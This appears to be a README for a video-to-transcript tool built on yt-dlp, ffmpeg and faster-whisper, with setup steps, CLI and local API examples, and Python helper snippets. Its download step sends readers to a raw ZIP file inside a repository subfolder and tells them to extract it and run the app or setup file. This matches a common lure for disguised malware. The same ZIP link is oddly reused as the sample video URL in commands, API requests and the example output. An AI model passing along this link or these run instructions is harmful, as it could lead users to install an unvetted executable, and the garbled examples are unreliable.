Universal Video Transcriber turns a video URL into a transcript file in JSON format.
Use it when you want to:
- copy spoken words from a video
- keep a time-based record of audio
- process links from many sites in one tool
- get text from videos without doing it by hand
It follows this flow:
- video URL in
- media download with yt-dlp
- audio cleanup with ffmpeg
- speech to text with faster-whisper
- timestamped JSON out
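The flow above can be sketched in Python as follows. This is a minimal illustration, not the tool's actual implementation: the function names, the file names, the specific yt-dlp and ffmpeg options, and the choice of 16 kHz mono WAV are all assumptions made for the example.

```python
import subprocess
from pathlib import Path


def ytdlp_command(url: str, workdir: Path) -> list[str]:
    """Build a yt-dlp call that downloads the best available audio stream."""
    # -f bestaudio/best: prefer an audio-only stream, else the best combined one.
    # -o: output template; yt-dlp fills in %(ext)s with the real extension.
    return ["yt-dlp", "-f", "bestaudio/best", "-o", str(workdir / "media.%(ext)s"), url]


def ffmpeg_command(src: Path, dst: Path) -> list[str]:
    """Build an ffmpeg call that converts media to 16 kHz mono audio."""
    # -y overwrites dst, -vn drops video, -ac 1 is mono, -ar 16000 resamples.
    return ["ffmpeg", "-y", "-i", str(src), "-vn", "-ac", "1", "-ar", "16000", str(dst)]


def transcribe(wav: Path, model_size: str = "small") -> dict:
    """Run faster-whisper and return a dict shaped like the JSON output."""
    from faster_whisper import WhisperModel  # imported lazily; heavy dependency

    model = WhisperModel(model_size)
    segments, info = model.transcribe(str(wav), word_timestamps=True)
    return {
        "language": info.language,
        "model_size": model_size,
        "transcript": [
            {"start": s.start, "end": s.end, "text": s.text.strip()} for s in segments
        ],
    }


def run_pipeline(url: str, workdir: Path, model_size: str = "small") -> dict:
    """Download, clean up, and transcribe one video URL."""
    subprocess.run(ytdlp_command(url, workdir), check=True)
    media = next(workdir.glob("media.*"))  # the file yt-dlp just wrote
    wav = workdir / "audio.wav"
    subprocess.run(ffmpeg_command(media, wav), check=True)
    return transcribe(wav, model_size)
```

Building the command lists in separate functions keeps each stage easy to inspect before anything is downloaded.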
- Visit the download page here: https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip
- On the page, look for the latest release or the main project files.
- Download the Windows version if one is provided, or download the source package if that is the only option.
- Save the file to your computer, then open the folder where it downloaded.
- If you get a ZIP file, right-click it and choose Extract All.
- Open the extracted folder and look for the app file or setup file.
- If the app opens in a terminal window, that is normal for this tool.
- Keep the folder in a place you can find again, such as Downloads or Desktop.
For a smooth run on Windows, install these tools first:
- Python 3.10 or newer
- ffmpeg
- yt-dlp
You also need enough free disk space for temporary video files. A larger video will use more space.
If you plan to process long videos, use a machine with at least 8 GB of memory.
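The prerequisites above can be checked with a short script before installing anything else. This is a minimal sketch using only the standard library. It is separate from the tool's own checks, and the 2 GB free-space threshold is an assumed placeholder, not a documented requirement.

```python
import shutil
import sys
from pathlib import Path


def check_prerequisites(workdir: Path = Path("."), min_free_gb: float = 2.0) -> dict:
    """Return a name -> bool map of the basic requirements."""
    free_gb = shutil.disk_usage(workdir).free / 1024**3
    return {
        "python>=3.10": sys.version_info >= (3, 10),
        "ffmpeg on PATH": shutil.which("ffmpeg") is not None,
        "yt-dlp on PATH": shutil.which("yt-dlp") is not None,
        # min_free_gb is an assumption; large videos may need more.
        "free disk space": free_gb >= min_free_gb,
    }


if __name__ == "__main__":
    for name, ok in check_prerequisites().items():
        print(f"{'OK     ' if ok else 'MISSING'} {name}")
```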
If you downloaded the source version, do this on Windows:
- Install Python from the official Python website.
- Make sure Python is added to PATH during install.
- Open Command Prompt in the project folder.
- Create a virtual environment:
    python -m venv .venv
- Activate it:
    .venv\Scripts\activate
- Install the app requirements:
    pip install -r requirements.txt
- Install ffmpeg and yt-dlp if they are not already on your system.
Use the command below to check that your setup works:

    python skill/video-url-transcriber/scripts/transcribe_url.py --doctor

Then run a transcription with a video link:

    python skill/video-url-transcriber/scripts/transcribe_url.py "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip" --model-size small

If you want faster results, keep --model-size small.
If you want better accuracy on harder audio, use a larger model size.
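To process several links with the same settings, the command can be wrapped in a small Python loop. This is a sketch under assumptions: it expects to be run from the project folder with the virtual environment active, it uses only the script path and the --model-size flag shown above, and the helper names are hypothetical. Treating a non-zero exit code as failure is a common convention, not documented behavior of this tool.

```python
import subprocess
import sys

# Script path as given in the commands above, relative to the project folder.
SCRIPT = "skill/video-url-transcriber/scripts/transcribe_url.py"


def build_command(url: str, model_size: str = "small") -> list[str]:
    """Build the argument list for one transcription run."""
    return [sys.executable, SCRIPT, url, "--model-size", model_size]


def transcribe_all(urls: list[str], model_size: str = "small") -> dict:
    """Run the CLI once per URL and return each URL's exit code."""
    results = {}
    for url in urls:
        results[url] = subprocess.run(build_command(url, model_size)).returncode
    return results
```

Using `sys.executable` keeps the runs inside the same Python environment that launched the loop.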
If you want to send requests from another app, start the API server:

    python skill/video-url-transcriber/scripts/run_api.py

The server runs on:

    http://127.0.0.1:8099

Use this endpoint to transcribe a video:

    curl -s http://127.0.0.1:8099/transcribe \
      -H 'content-type: application/json' \
      -d '{
        "url": "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip",
        "language": null,
        "model_size": "small",
        "word_timestamps": true,
        "persist_media": false
      }'

The app returns JSON with details about the source video and the transcript.
Example shape:

    {
      "source_url": "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip",
      "platform": "x",
      "title": "Example Video Title",
      "language": "en",
      "model_size": "small",
      "transcript": [
        {
          "start": 0.0,
          "end": 3.2,
          "text": "Hello and welcome."
        }
      ]
    }

Common fields include:
- source_url: the original link you gave the app
- platform: the site name detected by the tool
- title: the video title when available
- language: the spoken language, when the tool can detect it
- model_size: the speech model used
- transcript: the timed text split into parts
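The same request can be sent from Python instead of curl. The sketch below uses only the standard library and mirrors the request body shown in the curl example. The function names and the 600 second timeout are assumptions for illustration, and the response is assumed to be a single JSON object like the example shape.

```python
import json
import urllib.request

API_URL = "http://127.0.0.1:8099/transcribe"


def build_request(video_url, language=None, model_size="small",
                  word_timestamps=True, persist_media=False):
    """Build a POST request with the same JSON body as the curl example."""
    payload = {
        "url": video_url,
        "language": language,  # None is sent as JSON null
        "model_size": model_size,
        "word_timestamps": word_timestamps,
        "persist_media": persist_media,
    }
    return urllib.request.Request(
        API_URL,
        data=json.dumps(payload).encode("utf-8"),
        headers={"content-type": "application/json"},
        method="POST",
    )


def transcribe(video_url, timeout=600.0, **options):
    """Send the request to a running server and return the parsed JSON."""
    request = build_request(video_url, **options)
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return json.load(response)


if __name__ == "__main__":
    result = transcribe("VIDEO_URL")  # replace with a real video link
    for segment in result["transcript"]:
        print(f'{segment["start"]:8.1f}  {segment["text"]}')
```

The API server must already be running for `transcribe` to succeed; `build_request` can be inspected without it.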
Use short, clear video links when possible.
If a site blocks downloads, try a different link from the same platform.
If audio is noisy, the transcript may have more errors.
If the video has more than one speaker, each part of the transcript still carries its timestamps, so you can work out who said what from context.
For best results:
- use good audio
- choose the right language if you know it
- pick a larger model for harder audio
- keep word_timestamps on if you need fine timing

    python skill/video-url-transcriber/scripts/transcribe_url.py "VIDEO_URL"

    python skill/video-url-transcriber/scripts/transcribe_url.py --doctor

    python skill/video-url-transcriber/scripts/run_api.py

    curl -s http://127.0.0.1:8099/transcribe \
      -H 'content-type: application/json' \
      -d '{
        "url": "VIDEO_URL",
        "language": null,
        "model_size": "small",
        "word_timestamps": true,
        "persist_media": false
      }'

After a run, the tool may create:
- a JSON transcript file
- temporary media files
- audio files used during processing
If persist_media is set to false, the app cleans up temporary files after it finishes.
If you keep media, use a folder with enough space.
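The cleanup behavior described above follows a common temporary-directory pattern. The sketch below illustrates that pattern only; it is not the tool's code, and `run_job`, `work`, and `keep_dir` are hypothetical names introduced for the example.

```python
import shutil
import tempfile
from pathlib import Path
from typing import Callable, Optional


def run_job(work: Callable[[Path], object],
            persist_media: bool = False,
            keep_dir: Optional[Path] = None):
    """Run work() in a temp folder; keep its files only if asked to."""
    with tempfile.TemporaryDirectory(prefix="transcriber-") as tmp:
        tmp_path = Path(tmp)
        result = work(tmp_path)  # download, convert, transcribe, etc.
        if persist_media and keep_dir is not None:
            keep_dir.mkdir(parents=True, exist_ok=True)
            for item in tmp_path.iterdir():
                # Move media out before the temp folder is removed.
                shutil.move(str(item), str(keep_dir / item.name))
        return result
    # Leaving the with-block deletes the temp folder and anything left in it.
```

With `persist_media=False` nothing survives the run except the returned result, which matches the cleanup described above.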
If the app does not start, check these items:
- Python is installed
- ffmpeg is installed
- yt-dlp is installed
- you are in the correct folder
- the virtual environment is active
If a video link fails, try another supported site or a different video URL.
If transcription takes a long time, use a shorter video or a smaller model.
If you see missing audio errors, the source video may not contain clear sound.
For smoother use:
- keep the app folder simple, such as C:\transcriber
- avoid paths with special characters
- close other heavy apps while processing large videos
- use wired power on a laptop during long jobs
The tool works with any site that yt-dlp can read.
That usually includes:
- YouTube
- X
- Vimeo
- many public video pages
- other direct media pages supported by yt-dlp

- Copy a video URL.
- Run the transcriber.
- Wait for the audio to download and process.
- Open the JSON output.
- Use the timestamps to find the part you need.

- save a class lecture as text
- turn a meeting recording into notes
- review a talk without replaying the full video
- search spoken content more easily
- keep a time-based transcript for later work
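Searching spoken content and jumping to the right moment can be done with a few lines of Python once the JSON file exists. This is a minimal sketch that assumes the file matches the example shape (a top-level transcript list whose items have start, end, and text). The helper names and the file name transcript.json are hypothetical.

```python
import json
from pathlib import Path


def load_transcript(path: Path) -> list:
    """Read the JSON output and return its list of timed segments."""
    with open(path, encoding="utf-8") as handle:
        return json.load(handle)["transcript"]


def format_timestamp(seconds: float) -> str:
    """Format seconds as HH:MM:SS, dropping the fractional part."""
    hours, remainder = divmod(int(seconds), 3600)
    minutes, secs = divmod(remainder, 60)
    return f"{hours:02d}:{minutes:02d}:{secs:02d}"


def find_segments(transcript: list, query: str) -> list:
    """Return segments whose text contains the query, ignoring case."""
    needle = query.lower()
    return [seg for seg in transcript if needle in seg["text"].lower()]


if __name__ == "__main__":
    segments = load_transcript(Path("transcript.json"))  # hypothetical file name
    for seg in find_segments(segments, "welcome"):
        print(format_timestamp(seg["start"]), seg["text"])
```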